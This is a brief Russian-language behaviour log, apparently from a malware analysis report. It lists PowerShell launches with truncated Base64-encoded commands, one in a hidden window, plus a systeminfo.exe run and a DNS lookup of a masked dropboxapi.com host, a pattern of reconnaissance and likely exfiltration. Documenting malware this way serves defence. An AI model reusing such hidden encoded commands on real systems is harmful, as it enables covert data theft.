Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABwAGEAeQBsAG8AYQBkACAAPQAgACQAKABzAHkAcwB0AGUAbQBpAG4AZgBvACkADQAKACQAcABhAHkAbABvAGEAZAAgAD0AIAAkAHAAYQB5AGw...
- DNS ASK co#####.dropboxapi.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('JABwAGEAeQBsAG8AYQBkACAAPQAgACQAKABzAHkAcwB0AGUAbQBpAG4AZgBvACkADQAKACQAcABhAHkAbABvAGEAZAAgAD0AIAAkAHAAYQB5AGw...' (со скрытым окном)
- '<SYSTEM32>\systeminfo.exe'